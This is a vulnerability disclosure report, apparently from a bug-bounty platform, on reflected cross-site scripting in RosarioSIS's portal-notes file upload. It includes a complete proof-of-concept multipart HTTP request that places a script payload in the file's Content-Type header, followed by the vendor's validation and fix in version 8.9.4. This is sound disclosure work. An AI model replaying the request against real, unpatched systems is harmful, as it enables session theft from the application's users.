Cross-site scripting - Reflected via mime-type file upload in francoisjacquet/rosariosis

Valid

Reported on

Apr 23rd 2022

Description

When user upload file with extension not in white-list, server will throw error attach with mime-type of file upload (user can controll) without sanitize.

Proof of Concept

POST /rosariosis/Modules.php?modname=School_Setup/PortalNotes.php&modfunc=update HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------3345002182489293764621537208
Content-Length: 2444
Origin: http://localhost:8080
Connection: close
Referer: http://localhost:8080/rosariosis/Modules.php?modname=School_Setup/PortalNotes.php
Cookie: RosarioSIS=usti6etu55tb38dsu6iq78c1u5
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][TITLE]"

<h1>123</h1>
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][CONTENT]"

<h1>123</h1>
![]("/>)
-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][SORT_ORDER]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="FILE_ATTACHED_FILE"; filename="aaa.php"
Content-Type: <script>alert()</script> --> lead to xss

my file

-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="values[new][FILE_ATTACHED_EMBED]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][START_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="month_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="day_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="year_values[new][END_DATE]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][admin]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][teacher]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][parent]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][0]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][1]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][2]"


-----------------------------3345002182489293764621537208
Content-Disposition: form-data; name="profiles[new][3]"


-----------------------------3345002182489293764621537208--

PoC Image

image image

Impact

This vulnerability can be arbitrarily executed javascript code, steal user'cookie, etc...

We are processing your report and will contact the francoisjacquet/rosariosis team within 24 hours. a year ago
Nhien.IT modified the report
a year ago
François Jacquet validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
François Jacquet marked this as fixed in 8.9.4 with commit 4cb892 a year ago
François Jacquet has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation